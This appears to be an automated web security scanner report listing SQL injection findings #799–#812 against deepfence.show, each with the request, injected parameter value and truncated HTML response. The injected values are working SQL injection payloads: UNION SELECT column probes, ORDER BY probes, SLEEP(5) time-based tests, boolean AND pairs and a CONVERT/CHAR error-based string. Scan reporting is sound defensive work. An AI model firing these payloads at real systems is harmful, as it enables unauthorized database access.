lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #799\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #800\nScan SQL Injection\nSeverity ERROREndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29\n#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title>\nDeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script language=\n\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER__\"; </\nscript> <!-- Start of Zendesk Widget script --> <!-- <script id=\"ze-snippet\"\nsrc=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-9a0a-4c32-aed4-\nbfb86b515320\"> </script> --> <!-- End of Zendesk Widget script --> <!-- \nBootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/png\" href=\"data:\nimage/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJ\nbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCgAQ\nIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary \nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #801\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #802\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioOR x=x#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #803\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\ndemouser@\ndeepfence.io\") or sleep(5)=\"\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #804\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessaryhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #805\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 30\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #806\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io /*!10000%201/0%20*/\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: Response is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #807\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 30#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #808Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ORDER BY SLEEP(5)#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #809\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io AND 7300=7300 AND ('pKlZ'='pKlZ\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #810\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io '&&SLEEP(5)&&'1\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #811\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1Test Step GET\nModified \nParametersName Value\ndemouser@deepfence.io AND 7300=7300 AND ('pKlZ'='pKlY\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #812\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioAND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(\n88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)\n+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)))--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script 